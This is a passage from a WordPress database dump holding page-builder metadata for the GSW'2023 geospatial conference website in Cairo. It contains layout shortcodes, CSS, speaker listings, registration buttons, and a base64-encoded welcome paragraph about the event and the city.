aWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3bd334\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5f86e4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fc561a1\",\"elType\":\"widget\",\"settings\":{\"read_more_button_text\":\"Read more\",\"filter_all_text\":\"View all\",\"pagination_load_more_text\":\"Load more\",\"post_meta_separator\":\"\\u2022\"},\"elements\":[],\"widgetType\":\"the7_elements\"}],\"isInner\":false}],\"isInner\":false}]'),
(6115,2382,'_elementor_page_assets','a:0:{}'),
(6116,2382,'_elementor_css','a:6:{s:4:\"time\";i:1665108160;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:8:\"fa-solid\";i:1;s:10:\"the7-icons\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(6117,2383,'_elementor_edit_mode','builder'),
(6118,2383,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}.vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665135361340{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(6119,2383,'_wp_page_template','default'),
(6120,2383,'_elementor_template_type','wp-page'),
(6121,2383,'_elementor_version','3.7.8'),
(6122,2383,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3bd334\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5f86e4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fc561a1\",\"elType\":\"widget\",\"settings\":{\"read_more_button_text\":\"Read more\",\"filter_all_text\":\"View all\",\"pagination_load_more_text\":\"Load more\",\"post_meta_separator\":\"\\u2022\"},\"elements\":[],\"widgetType\":\"the7_elements\"}],\"isInner\":false}],\"isInner\":false}]'),
(6123,2383,'_elementor_page_assets','a:0:{}'),
(6124,2383,'_elementor_css','a:6:{s:4:\"time\";i:1665147298;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:8:\"fa-solid\";i:1;s:10:\"the7-icons\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(6125,2384,'_wp_page_template','default'),
(6126,2384,'_elementor_edit_mode','builder'),
(6127,2384,'_elementor_template_type','wp-page'),
(6128,2384,'_elementor_version','3.7.8'),
(6129,2384,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc